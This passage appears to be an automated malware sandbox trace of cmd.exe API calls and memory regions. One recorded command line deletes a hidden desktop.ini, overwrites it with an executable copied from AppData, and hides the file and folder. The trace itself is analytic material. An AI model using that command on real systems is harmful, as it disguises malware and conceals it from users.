_get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.732] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, 
lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.733] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: 
hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.735] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.736] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, 
lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] GetFileType (hFile=0x4c) returned 0x1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.737] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x32, lpOverlapped=0x0) returned 1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] GetFileType (hFile=0x4c) returned 0x1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] GetFileType (hFile=0x4c) returned 0x1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x32, lpOverlapped=0x0) returned 1 [0130.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.737] _close (_FileHandle=4) returned 0 [0130.738] FindNextFileW (in: hFindFile=0x2e0e78, lpFindFileData=0x22efbc | out: lpFindFileData=0x22efbc) returned 0 [0130.738] GetLastError () returned 0x12 [0130.738] FindClose (in: hFindFile=0x2e0e78 | out: hFindFile=0x2e0e78) returned 1 [0130.739] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0130.739] _close (_FileHandle=3) returned 0 [0130.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.739] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.739] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.739] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.739] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.740] SetConsoleInputExeNameW () returned 0x1 [0130.740] GetConsoleOutputCP () returned 0x1b5 [0130.740] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.740] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.740] exit (_Code=0) 
Process: id = "101" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168a0" os_pid = "0x848" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11588 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11589 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 11590 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 11591 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 11592 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 
11593 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11594 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11595 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11596 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 11597 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11646 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11647 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11648 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11649 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 11650 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 11651 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11652 
start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11653 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11654 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11655 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11656 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11657 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11658 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11659 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11660 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 11661 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = 
mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11662 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11663 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 11664 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11665 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 11666 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 11667 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 11668 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 11669 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 11699 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 158 os_tid = 0x858 [0130.650] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fe64 | out: lpSystemTimeAsFileTime=0x12fe64*(dwLowDateTime=0x87ced1e0, dwHighDateTime=0x1d440a9)) [0130.650] GetCurrentProcessId () returned 0x848 [0130.650] GetCurrentThreadId () returned 0x858 [0130.650] 
GetTickCount () returned 0x29b45 [0130.650] QueryPerformanceCounter (in: lpPerformanceCount=0x12fe5c | out: lpPerformanceCount=0x12fe5c*=18743940314) returned 1 [0130.651] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0130.651] __set_app_type (_Type=0x1) [0130.651] __p__fmode () returned 0x76b331f4 [0130.651] __p__commode () returned 0x76b331fc [0130.651] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0130.651] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0130.652] GetCurrentThreadId () returned 0x858 [0130.652] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x858) returned 0x38 [0130.652] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.652] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0130.652] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.652] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.652] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fdf4 | out: phkResult=0x12fdf4*=0x0) returned 0x2 [0130.652] VirtualQuery (in: lpAddress=0x12fe2b, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.652] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.652] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x31000, 
